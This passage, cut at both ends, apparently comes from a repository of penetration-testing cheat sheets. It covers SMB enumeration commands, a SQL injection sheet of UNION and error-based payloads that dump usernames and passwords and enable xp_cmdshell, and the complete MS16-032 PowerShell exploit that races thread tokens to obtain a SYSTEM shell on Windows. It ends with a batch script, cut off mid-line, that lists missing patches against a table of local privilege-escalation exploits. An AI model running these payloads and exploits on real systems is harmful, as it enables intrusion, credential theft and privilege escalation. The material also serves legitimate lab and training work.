| 61 | ### rpcclient 62 | 63 | `rpcclient -U "" -N 172.16.1.5` 64 | 65 | `rpcclient -u "Administrator" -N 17.16.1.5` 66 | 67 | Commands 68 | enumdomusers 69 | netshareenum 70 | netshareenumall 71 | querydominfo 72 | lookupname root 73 | queryuser john 74 | 75 | ### Enum4linux 76 | 77 | All info 78 | 79 | `enum4linux -a 172.16.1.5` 80 | 81 | With User and blank pass 82 | 83 | `enum4linux -a -u administrator -p "" 172.16.1.5` 84 | 85 | ### NMAP NSE 86 | 87 | ### SMB OS Discovery 88 | 89 | `nmap 172.20.10.5 --script smb-os-discovery` 90 | 91 | `nmap -v --script=smb-enum-shares 172.166.1.5` 92 | 93 | ### show SMB scripts and 94 | 95 | `ls /usr/share/nmap/scripts | grep smb ` 96 | -------------------------------------------------------------------------------- /CheatSheets/SQLI/barehands/readme.md: -------------------------------------------------------------------------------- 1 | # SQLI tricks 2 | 3 | ## GET 4 | 5 | ### Error-Based 6 | 7 | ### Simple test 8 | 9 | `Adding a simpe quote '` 10 | 11 | Example: `http://192.168.1.104/Less-1/?id=5'` 12 | 13 | ### Fuzzing 14 | 15 | Sorting columns to find maximum column 16 | 17 | `http://192.168.1.104/Less-1/?id=-1 order by 1` 18 | 19 | `http://192.168.1.104/Less-1/?id=-1 order by 2` 20 | 21 | `http://192.168.1.104/Less-1/?id=-1 order by 3` 22 | 23 | (until it stop returning errors) 24 | 25 | --- 26 | 27 | 28 | ### Finding what column is injectable 29 | 30 | **mysql** 31 | `http://192.168.1.104/Less-1/?id=-1 union select 1, 2, 3` (using the same amount of columns you got on the previous step) 32 | 33 | **postgresql** 34 | `http://192.168.1.104/Less-1/?id=-1 union select NULL, NULL, NULL` (using the same amount of columns you got on the previous step) 35 | 36 | one of the columns will be printed with the respective number 37 | 38 | --- 39 | 40 | 41 | #### Finding version 42 | 43 | `http://192.168.1.104/Less-1/?id=-1 union select 1, 2, version()` **mysql** 44 | `http://192.168.1.104/Less-1/?id=-1 union select NULL, NULL, version()` **postgres**s 45 | 46 | 47 | #### Finding database name 48 | 49 | `http://192.168.1.104/Less-1/?id=-1 union select 1,2, database()` **mysql** 50 | 51 | `http://192.168.1.104/Less-1/?id=-1 union select NULL,NULL, database()` **postgres** 52 | 53 | 54 | #### Finding usernames logged in 55 | 56 | `http://192.168.1.104/Less-1/?id=-1 union select 1, 2, current_user()` **mysql** 57 | 58 | 59 | #### Finding databases 60 | 61 | `http://192.168.1.104/Less-1/?id=-1 union select 1, 2, schema_name from information_schema.schemata` **mysql** 62 | 63 | `http://192.168.1.104/Less-1/?id=-1 union select 1, 2, datname from pg_database` **postgres** 64 | 65 | 66 | #### Finding table names from a database 67 | 68 | `http://192.168.1.104/Less-1/?id=-1 union select 1, 2, table_name from information_schema.tables where table_schema="database_name"` **mysql** 69 | 70 | `http://192.168.1.104/Less-1/?id=-1 union select 1, 2, tablename from pg_tables where table_catalog="database_name"` **postgres** 71 | 72 | 73 | #### Finding column names from a table 74 | 75 | `http://192.168.1.104/Less-1/?id=-1 union select 1, 2, column_name from information_schema.columns where table_schema="database_name" and table_name="tablename"` **mysql** 76 | 77 | `http://192.168.1.104/Less-1/?id=-1 union select 1, 2, column_name from information_schema.columns where table_catalog="database_name" and table_name="tablename"` **postgres** 78 | 79 | #### Concatenate 80 | 81 | Example: 82 | 83 | `http://192.168.1.104/Less-1/?id=-1 union select 1, 2, login from users;` 84 | `http://192.168.1.104/Less-1/?id=-1 union select 1, 2, password from users;` 85 | 86 | in one query 87 | 88 | `http://192.168.1.104/Less-1/?id=-1 union select 1, 2, concat(login,':',password) from users;` **mysql** 89 | `http://192.168.1.104/Less-1/?id=-1 union select 1, 2, login||':'||password from users;` **postgres** 90 | 91 | 92 | ### Error Based SQLI (USUALLY MS-SQL) 93 | 94 | #### Current user 95 | 96 | `http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(user_name() as varchar(4096)))--` 97 | 98 | 99 | #### DBMS version 100 | 101 | `http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(@@version as varchar(4096)))--` 102 | 103 | 104 | #### Database name 105 | 106 | `http://192.168.1.104/Less-1/?id=-1 or db_name(0)=0 --` 107 | 108 | 109 | #### Tables from a database 110 | 111 | `http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM dbname..sysobjects where xtype='U')--` 112 | 113 | --- 114 | 115 | `http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM dbname..sysobjects where xtype='U' AND name NOT IN ('previouslyFoundTable',...))--` 116 | 117 | 118 | #### Columns within a table 119 | 120 | 121 | `http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(dbname..syscolumns.name as varchar(4096)) FROM dbname..syscolumns, dbname..sysobjects WHERE dbname..syscolumns.id=dbname..sysobjects.id AND dbname..sysobjects.name = 'tablename')--` 122 | 123 | > remember to change **dbname** and **tablename** accordingly with the given situation 124 | > after each iteration a new column name will be found, make sure add it to ** previously found column name ** separated by comma as on the next sample 125 | 126 | `http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(dbname..syscolumns.name as varchar(4096)) FROM dbname..syscolumns, dbname..sysobjects WHERE dbname..syscolumns.id=dbname..sysobjects.id AND dbname..sysobjects.name = 'tablename' AND dbname..syscolumns.name NOT IN('previously found column name', ...))--` 127 | 128 | 129 | #### Actual data 130 | 131 | 132 | `http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(columnName as varchar(4096)) FROM tablename)--` 133 | 134 | > after each iteration a new column name will be found, make sure add it to ** previously found column name ** separated by comma as on the next sample 135 | 136 | `http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(columnName as varchar(4096)) FROM tablename AND name NOT IN('previously found row data'))--` 137 | 138 | 139 | #### Shell commands 140 | 141 | `EXEC master..xp_cmdshell <command>` 142 | 143 | > you need yo be 'sa' user 144 | 145 | #### Enabling shell commands 146 | 147 | `EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_congigure 'xp_shell', 1; RECONFIGURE;` 148 | -------------------------------------------------------------------------------- /CheatSheets/windows/priv_esc/Invoke-MS16-032.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-MS16-032 { 2 | Add-Type -TypeDefinition @" 3 | using System; 4 | using System.Diagnostics; 5 | using System.Runtime.InteropServices; 6 | using System.Security.Principal; 7 | 8 | [StructLayout(LayoutKind.Sequential)] 9 | public struct PROCESS_INFORMATION 10 | { 11 | public IntPtr hProcess; 12 | public IntPtr hThread; 13 | public int dwProcessId; 14 | public int dwThreadId; 15 | } 16 | 17 | [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)] 18 | public struct STARTUPINFO 19 | { 20 | public Int32 cb; 21 | public string lpReserved; 22 | public string lpDesktop; 23 | public string lpTitle; 24 | public Int32 dwX; 25 | public Int32 dwY; 26 | public Int32 dwXSize; 27 | public Int32 dwYSize; 28 | public Int32 dwXCountChars; 29 | public Int32 dwYCountChars; 30 | public Int32 dwFillAttribute; 31 | public Int32 dwFlags; 32 | public Int16 wShowWindow; 33 | public Int16 cbReserved2; 34 | public IntPtr lpReserved2; 35 | public IntPtr hStdInput; 36 | public IntPtr hStdOutput; 37 | public IntPtr hStdError; 38 | } 39 | 40 | [StructLayout(LayoutKind.Sequential)] 41 | public struct SQOS 42 | { 43 | public int Length; 44 | public int ImpersonationLevel; 45 | public int ContextTrackingMode; 46 | public bool EffectiveOnly; 47 | } 48 | 49 | public static class Advapi32 50 | { 51 | [DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)] 52 | public static extern bool CreateProcessWithLogonW( 53 | String userName, 54 | String domain, 55 | String password, 56 | int logonFlags, 57 | String applicationName, 58 | String commandLine, 59 | int creationFlags, 60 | int environment, 61 | String currentDirectory, 62 | ref STARTUPINFO startupInfo, 63 | out PROCESS_INFORMATION processInformation); 64 | 65 | [DllImport("advapi32.dll", SetLastError=true)] 66 | public static extern bool SetThreadToken( 67 | ref IntPtr Thread, 68 | IntPtr Token); 69 | 70 | [DllImport("advapi32.dll", SetLastError=true)] 71 | public static extern bool OpenThreadToken( 72 | IntPtr ThreadHandle, 73 | int DesiredAccess, 74 | bool OpenAsSelf, 75 | out IntPtr TokenHandle); 76 | 77 | [DllImport("advapi32.dll", SetLastError=true)] 78 | public static extern bool OpenProcessToken( 79 | IntPtr ProcessHandle, 80 | int DesiredAccess, 81 | ref IntPtr TokenHandle); 82 | 83 | [DllImport("advapi32.dll", SetLastError=true)] 84 | public extern static bool DuplicateToken( 85 | IntPtr ExistingTokenHandle, 86 | int SECURITY_IMPERSONATION_LEVEL, 87 | ref IntPtr DuplicateTokenHandle); 88 | } 89 | 90 | public static class Kernel32 91 | { 92 | [DllImport("kernel32.dll")] 93 | public static extern uint GetLastError(); 94 | 95 | [DllImport("kernel32.dll", SetLastError=true)] 96 | public static extern IntPtr GetCurrentProcess(); 97 | 98 | [DllImport("kernel32.dll", SetLastError=true)] 99 | public static extern IntPtr GetCurrentThread(); 100 | 101 | [DllImport("kernel32.dll", SetLastError=true)] 102 | public static extern int GetThreadId(IntPtr hThread); 103 | 104 | [DllImport("kernel32.dll", SetLastError = true)] 105 | public static extern int GetProcessIdOfThread(IntPtr handle); 106 | 107 | [DllImport("kernel32.dll",SetLastError=true)] 108 | public static extern int SuspendThread(IntPtr hThread); 109 | 110 | [DllImport("kernel32.dll",SetLastError=true)] 111 | public static extern int ResumeThread(IntPtr hThread); 112 | 113 | [DllImport("kernel32.dll", SetLastError=true)] 114 | public static extern bool TerminateProcess( 115 | IntPtr hProcess, 116 | uint uExitCode); 117 | 118 | [DllImport("kernel32.dll", SetLastError=true)] 119 | public static extern bool CloseHandle(IntPtr hObject); 120 | 121 | [DllImport("kernel32.dll", SetLastError=true)] 122 | public static extern bool DuplicateHandle( 123 | IntPtr hSourceProcessHandle, 124 | IntPtr hSourceHandle, 125 | IntPtr hTargetProcessHandle, 126 | ref IntPtr lpTargetHandle, 127 | int dwDesiredAccess, 128 | bool bInheritHandle, 129 | int dwOptions); 130 | } 131 | 132 | public static class Ntdll 133 | { 134 | [DllImport("ntdll.dll", SetLastError=true)] 135 | public static extern int NtImpersonateThread( 136 | IntPtr ThreadHandle, 137 | IntPtr ThreadToImpersonate, 138 | ref SQOS SecurityQualityOfService); 139 | } 140 | "@ 141 | 142 | function Get-ThreadHandle { 143 | # StartupInfo Struct 144 | $StartupInfo = New-Object STARTUPINFO 145 | $StartupInfo.dwFlags = 0x00000100 # STARTF_USESTDHANDLES 146 | $StartupInfo.hStdInput = [Kernel32]::GetCurrentThread() 147 | $StartupInfo.hStdOutput = [Kernel32]::GetCurrentThread() 148 | $StartupInfo.hStdError = [Kernel32]::GetCurrentThread() 149 | $StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size 150 | 151 | # ProcessInfo Struct 152 | $ProcessInfo = New-Object PROCESS_INFORMATION 153 | 154 | # CreateProcessWithLogonW --> lpCurrentDirectory 155 | $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName 156 | 157 | # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED 158 | $CallResult = [Advapi32]::CreateProcessWithLogonW( 159 | "user", "domain", "pass", 160 | 0x00000002, "C:\Windows\System32\cmd.exe", "", 161 | 0x00000004, $null, $GetCurrentPath, 162 | [ref]$StartupInfo, [ref]$ProcessInfo) 163 | 164 | # Duplicate handle into current process -> DUPLICATE_SAME_ACCESS 165 | $lpTargetHandle = [IntPtr]::Zero 166 | $CallResult = [Kernel32]::DuplicateHandle( 167 | $ProcessInfo.hProcess, 0x4, 168 | [Kernel32]::GetCurrentProcess(), 169 | [ref]$lpTargetHandle, 0, $false, 170 | 0x00000002) 171 | 172 | # Clean up suspended process 173 | $CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1) 174 | $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess) 175 | $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread) 176 | 177 | $lpTargetHandle 178 | } 179 | 180 | function Get-SystemToken { 181 | echo "`n[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($hThread))).ProcessName)" 182 | 183 | $CallResult = [Kernel32]::SuspendThread($hThread) 184 | if ($CallResult -ne 0) { 185 | echo "[!] $hThread is a bad thread, exiting.." 186 | Return 187 | } echo "[+] Thread suspended" 188 | 189 | echo "[>] Wiping current impersonation token" 190 | $CallResult = [Advapi32]::SetThreadToken([ref]$hThread, [IntPtr]::Zero) 191 | if (!$CallResult) { 192 | echo "[!] SetThreadToken failed, exiting.." 193 | $CallResult = [Kernel32]::ResumeThread($hThread) 194 | echo "[+] Thread resumed!" 195 | Return 196 | } 197 | 198 | echo "[>] Building SYSTEM impersonation token" 199 | # SecurityQualityOfService struct 200 | $SQOS = New-Object SQOS 201 | $SQOS.ImpersonationLevel = 2 #SecurityImpersonation 202 | $SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS) 203 | # Undocumented API's, I like your style Microsoft ;) 204 | $CallResult = [Ntdll]::NtImpersonateThread($hThread, $hThread, [ref]$sqos) 205 | if ($CallResult -ne 0) { 206 | echo "[!] NtImpersonateThread failed, exiting.." 207 | $CallResult = [Kernel32]::ResumeThread($hThread) 208 | echo "[+] Thread resumed!" 209 | Return 210 | } 211 | 212 | # Null $SysTokenHandle 213 | $script:SysTokenHandle = [IntPtr]::Zero 214 | 215 | # 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE 216 | $CallResult = [Advapi32]::OpenThreadToken($hThread, 0x0006, $false, [ref]$SysTokenHandle) 217 | if (!$CallResult) { 218 | echo "[!] OpenThreadToken failed, exiting.." 219 | $CallResult = [Kernel32]::ResumeThread($hThread) 220 | echo "[+] Thread resumed!" 221 | Return 222 | } 223 | 224 | echo "[?] Success, open SYSTEM token handle: $SysTokenHandle" 225 | echo "[+] Resuming thread.." 226 | $CallResult = [Kernel32]::ResumeThread($hThread) 227 | } 228 | 229 | # main() <--- ;) 230 | $ms16032 = @" 231 | __ __ ___ ___ ___ ___ ___ ___ 232 | | V | _|_ | | _|___| |_ |_ | 233 | | |_ |_| |_| . |___| | |_ | _| 234 | |_|_|_|___|_____|___| |___|___|___| 235 | 236 | [by Jens Lindström ] 237 | "@ 238 | 239 | $ms16032 240 | 241 | # Check logical processor count, race condition requires 2+ 242 | echo "`n[?] Operating system core count: $([System.Environment]::ProcessorCount)" 243 | if ($([System.Environment]::ProcessorCount) -lt 2) { 244 | echo "[!] Race condition requires at least 2 CPU cores, exiting!`n" 245 | Return 246 | } 247 | 248 | echo "[>] Duplicating CreateProcessWithLogonW handle" 249 | $hThread = Get-ThreadHandle 250 | 251 | # If no thread handle is captured, the box is patched 252 | if ($hThread -eq 0) { 253 | echo "[!] No valid thread handle was captured, exiting!`n" 254 | Return 255 | } else { 256 | echo "[?] Done, using thread handle: $hThread" 257 | } echo "`n[*] Sniffing out privileged impersonation token.." 258 | 259 | # Get handle to SYSTEM access token 260 | Get-SystemToken 261 | 262 | # If we fail a check in Get-SystemToken, exit 263 | if ($SysTokenHandle -eq 0) { 264 | Return 265 | } 266 | 267 | echo "`n[*] Sniffing out SYSTEM shell.." 268 | echo "`n[>] Duplicating SYSTEM token" 269 | $hDuplicateTokenHandle = [IntPtr]::Zero 270 | $CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle) 271 | 272 | # Simple PS runspace definition 273 | echo "[>] Starting token race" 274 | $Runspace = [runspacefactory]::CreateRunspace() 275 | $StartTokenRace = [powershell]::Create() 276 | $StartTokenRace.runspace = $Runspace 277 | $Runspace.Open() 278 | [void]$StartTokenRace.AddScript({ 279 | Param ($hThread, $hDuplicateTokenHandle) 280 | while ($true) { 281 | $CallResult = [Advapi32]::SetThreadToken([ref]$hThread, $hDuplicateTokenHandle) 282 | } 283 | }).AddArgument($hThread).AddArgument($hDuplicateTokenHandle) 284 | $AscObj = $StartTokenRace.BeginInvoke() 285 | 286 | echo "[>] Starting process race" 287 | # Adding a timeout (10 seconds) here to safeguard from edge-cases 288 | $SafeGuard = [diagnostics.stopwatch]::StartNew() 289 | while ($SafeGuard.ElapsedMilliseconds -lt 10000) { 290 | 291 | # StartupInfo Struct 292 | $StartupInfo = New-Object STARTUPINFO 293 | $StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size 294 | 295 | # ProcessInfo Struct 296 | $ProcessInfo = New-Object PROCESS_INFORMATION 297 | 298 | # CreateProcessWithLogonW --> lpCurrentDirectory 299 | $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName 300 | 301 | # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED 302 | $CallResult = [Advapi32]::CreateProcessWithLogonW( 303 | "user", "domain", "pass", 304 | 0x00000002, "C:\Windows\System32\cmd.exe", "", 305 | 0x00000004, $null, $GetCurrentPath, 306 | [ref]$StartupInfo, [ref]$ProcessInfo) 307 | 308 | #--- 309 | # Make sure CreateProcessWithLogonW ran successfully! If not, skip loop. 310 | #--- 311 | # Missing this check used to cause the exploit to fail sometimes. 312 | # If CreateProcessWithLogon fails OpenProcessToken won't succeed 313 | # but we obviously don't have a SYSTEM shell :'( . Should be 100% 314 | # reliable now! 315 | #--- 316 | if (!$CallResult) { 317 | continue 318 | } 319 | 320 | $hTokenHandle = [IntPtr]::Zero 321 | $CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle) 322 | # If we can't open the process token it's a SYSTEM shell! 323 | if (!$CallResult) { 324 | echo "[!] Holy Handle Leak Potato, we have a SYSTEM shell !!!!!!`n" 325 | echo "[!] 637 fuck3d w1nd0w5 `n" 326 | $CallResult = [Kernel32]::ResumeThread($ProcessInfo.hThread) 327 | $StartTokenRace.Stop() 328 | $SafeGuard.Stop() 329 | Return 330 | } 331 | 332 | # Clean up suspended process 333 | $CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1) 334 | $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess) 335 | $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread) 336 | 337 | } 338 | 339 | # Kill runspace & stopwatch if edge-case 340 | $StartTokenRace.Stop() 341 | $SafeGuard.Stop() 342 | } -------------------------------------------------------------------------------- /CheatSheets/windows/priv_esc/WinPrivCheck.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | 3 | rem #---------------------------------------------------------------------------------# 4 | rem # Name = Windows Privilege Escalation Check v1.0 # 5 | rem # Reference = http://www.fuzzysecurity.com/tutorials/16.html # 6 | rem # Author = @ihack4falafel # 7 | rem # Date = 9/18/2017 # 8 | rem # Tested On = Windows XP SP3 - Professional # 9 | rem # Windows 7 SP1 - Entrprise # 10 | rem # Windows 10 - Professional # 11 | rem # Usage = WinPrivCheck.bat # 12 | rem # Requirements = accesschk.exe(old version) - sysinternals # 13 | rem #---------------------------------------------------------------------------------# 14 | 15 | 16 | @echo off 17 | rem Used rem instead of echo for cleaner output. 18 | @echo on 19 | 20 | rem #----------# 21 | rem # Hostname # 22 | rem #----------# 23 | 24 | @echo off 25 | 26 | hostname 27 | 28 | @echo on 29 | 30 | rem #----------# 31 | rem # Username # 32 | rem #----------# 33 | 34 | @echo off 35 | 36 | echo %username% 2>NUL 37 | whoami 2>NUL 38 | echo %userprofile% 2>NUL 39 | 40 | @echo on 41 | 42 | rem #-----------# 43 | rem # OS Verion # 44 | rem #-----------# 45 | 46 | @echo off 47 | 48 | systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" 49 | 50 | @echo on 51 | 52 | rem #--------------------# 53 | rem # Installed Software # 54 | rem #--------------------# 55 | 56 | @echo off 57 | 58 | wmic product get Name, Version 59 | 60 | @echo on 61 | 62 | rem #-----------------# 63 | rem # Available Users # 64 | rem #-----------------# 65 | 66 | @echo off 67 | 68 | net users 69 | 70 | @echo on 71 | 72 | rem #----------------# 73 | rem # Network Config # 74 | rem #----------------# 75 | 76 | @echo off 77 | 78 | ipconfig /all 79 | 80 | @echo on 81 | 82 | rem #--------------# 83 | rem # Route Config # 84 | rem #--------------# 85 | 86 | @echo off 87 | 88 | route print 89 | 90 | @echo on 91 | 92 | rem #-----------# 93 | rem # ARP Cache # 94 | rem #-----------# 95 | 96 | @echo off 97 | 98 | arp -a 99 | 100 | @echo on 101 | 102 | rem #---------------------# 103 | rem # Network Connections # 104 | rem #---------------------# 105 | 106 | @echo off 107 | 108 | netstat -ano 109 | 110 | @echo on 111 | 112 | rem #-------------------# 113 | rem # Firewall Settings # 114 | rem #-------------------# 115 | 116 | @echo off 117 | 118 | netsh firewall show state 119 | netsh firewall show config 120 | 121 | @echo on 122 | 123 | rem #------------------# 124 | rem # Running Services # 125 | rem #------------------# 126 | 127 | @echo off 128 | 129 | net start 130 | 131 | @echo on 132 | 133 | rem #------------------------# 134 | rem # Local PrivEsc Exploits # 135 | rem #------------------------# 136 | 137 | @echo off 138 | 139 | rem Given this script is for all versions of Windows, I'd reference the results with the below matrix to avoid false postives. 140 | 141 | 142 | rem #----------------------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 143 | rem # Exploits Index | 2K | XP | 2K3 | 2K8 | Vista | 7 | Title | 144 | rem #----------------------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 145 | rem # KB2592799 | MS11-080 | X | SP3 | SP3 | X | X | X | afd.sys - Local privilege Escalation | 146 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 147 | rem # KB3143141 | MS16-032 | X | X | X | SP1/2 | SP2 | SP1 | Secondary Logon - Local privilege Escalation | 148 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 149 | rem # KB2393802 | MS11-011 | X | SP2/3 | SP2 | SP2 | SP1/2 | SP0 | WmiTraceMessageVa - Local privilege Escalation | 150 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 151 | rem # KB982799 | MS10-059 | X | X | X | ALL | ALL | SP0 | Chimichurri - Local privilege Escalation | 152 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 153 | rem # KB979683 | MS10-021 | SP4 | SP2/3 | SP2 | SP2 | SP0/1/2 | SP0 | Windows Kernel - Local privilege Escalation | 154 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 155 | rem # KB2305420 | MS10-092 | X | X | X | SP0/1/2 | SP1/2 | SP0 | Task Scheduler - Local privilege Escalation | 156 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 157 | rem # KB981957 | MS10-073 | X | SP2/3 | SP2 | SP2 | SP1/2 | SP0 | Keyboard Layout - Local privilege Escalation | 158 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 159 | rem # KB4013081 | MS17-017 | X | X | X | SP2 | SP2 | SP1 | Registry Hive Loading - Local privilege Escalation | 160 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 161 | rem # KB977165 | MS10-015 | ALL | ALL | ALL | ALL | ALL | ALL | User Mode to Ring - Local privilege Escalation | 162 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 163 | rem # KB941693 | MS08-025 | SP4 | SP2 | SP1/2 | SP0 | SP0/1 | X | win32k.sys - Local privilege Escalation | 164 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 165 | rem # KB920958 | MS06-049 | SP4 | X | X | X | X | X | ZwQuerySysInfo - Local privilege Escalation | 166 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 167 | rem # KB914389 | MS06-030 | ALL | SP2 | X | X | X | X | Mrxsmb.sys - Local privilege Escalation | 168 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 169 | rem # KB908523 | MS05-055 | SP4 | X | X | X | X | X | APC Data-Free - Local privilege Escalation | 170 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 171 | rem # KB890859 | MS05-018 | SP3/4 | SP1/2 | X | X | X | X | CSRSS - Local privilege Escalation | 172 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 173 | rem # KB842526 | MS04-019 | SP2/3/4 | X | X | X | X | X | Utility Manager - Local privilege Escalation | 174 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 175 | rem # KB835732 | MS04-011 | SP2/3/4 | SP0/1 | X | X | X | X | LSASS service BoF - Remote Code Execution | 176 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 177 | rem # KB841872 | MS04-020 | SP4 | X | X | X | X | X | POSIX - Local Privilege Escalation | 178 | rem #----------------------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 179 | rem # KB2975684 | MS14-040 | X | X | SP2 | SP2 | SP2 | SP1 | afd.sys Dangling Pointer - Local Privilege Escalation | 180 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 181 | rem # KB3136041 | MS16-016 | X | X | X | SP1/2 | SP2 | SP1 | WebDAV to Address - Local Privilege Escalation | 182 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 183 | rem # KB3057191 | MS15-051 | X | X | SP2 | SP2 | SP2 | SP1 | win32k.sys - Local Privilege Escalation | 184 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 185 | rem # KB2989935 | MS14-070 | X | X | SP2 | X | X | X | TCP/IP - Local Privilege Escalation | 186 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 187 | rem # KB2503665 | MS11-046 | X | SP3 | SP2 | SP1/2 | SP1/2 | SP1 | 'afd.sys' - Local Privilege Escalation | 188 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 189 | 190 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2592799" | find /i "KB2592799" 1>NUL 191 | IF not errorlevel 1 ( 192 | 193 | echo MS11-080 patch is installed :( 194 | 195 | ) ELSE ( 196 | 197 | echo MS11-080 patch is NOT installed! 198 | 199 | ) 200 | 201 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3143141" | find /i "KB3143141" 1>NUL 202 | IF not errorlevel 1 ( 203 | 204 | echo MS16-032 patch is installed :( 205 | 206 | ) ELSE ( 207 | 208 | echo MS16-032 patch is NOT installed! 209 | 210 | ) 211 | 212 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2393802" | find /i "KB2393802" 1>NUL 213 | IF not errorlevel 1 ( 214 | 215 | echo MS11-011 patch is installed :( 216 | 217 | ) ELSE ( 218 | 219 | echo MS11-011 patch is NOT installed! 220 | 221 | ) 222 | 223 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB982799" | find /i "KB982799" 1>NUL 224 | IF not errorlevel 1 ( 225 | 226 | echo MS10-059 patch is installed :( 227 | 228 | ) ELSE ( 229 | 230 | echo MS10-059 patch is NOT installed! 231 | 232 | ) 233 | 234 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB979683" | find /i "KB979683" 1>NUL 235 | IF not errorlevel 1 ( 236 | 237 | echo MS10-021 patch is installed :( 238 | 239 | ) ELSE ( 240 | 241 | echo MS10-021 patch is NOT installed! 242 | 243 | ) 244 | 245 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2305420" | find /i "KB2305420" 1>NUL 246 | IF not errorlevel 1 ( 247 | 248 | echo MS10-092 patch is installed :( 249 | 250 | ) ELSE ( 251 | 252 | echo MS10-092 patch is NOT installed! 253 | 254 | ) 255 | 256 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB981957" | find /i "KB981957" 1>NUL 257 | IF not errorlevel 1 ( 258 | 259 | echo MS10-073 patch is installed :( 260 | 261 | ) ELSE ( 262 | 263 | echo MS10-073 patch is NOT installed! 264 | 265 | ) 266 | 267 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB4013081" | find /i "KB4013081" 1>NUL 268 | IF not errorlevel 1 ( 269 | 270 | echo MS17-017 patch is installed :( 271 | 272 | ) ELSE ( 273 | 274 | echo MS17-017 patch is NOT installed! 275 | 276 | ) 277 | 278 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB977165" | find /i "KB977165" 1>NUL 279 | IF not errorlevel 1 ( 280 | 281 | echo MS10-015 patch is installed :( 282 | 283 | ) ELSE ( 284 | 285 | echo MS10-015 patch is NOT installed! 286 | 287 | ) 288 | 289 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB941693" | find /i "KB941693" 1>NUL 290 | IF not errorlevel 1 ( 291 | 292 | echo MS08-025 patch is installed :( 293 | 294 | ) ELSE ( 295 | 296 | echo MS08-025 patch is NOT installed! 297 | 298 | ) 299 | 300 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB920958" | find /i "KB920958" 1>NUL 301 | IF not errorlevel 1 ( 302 | 303 | echo MS06-049 patch is installed :( 304 | 305 | ) ELSE ( 306 | 307 | echo MS06-049 patch is NOT installed! 308 | 309 | ) 310 | 311 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB914389" | find /i "KB914389" 1>NUL 312 | IF not 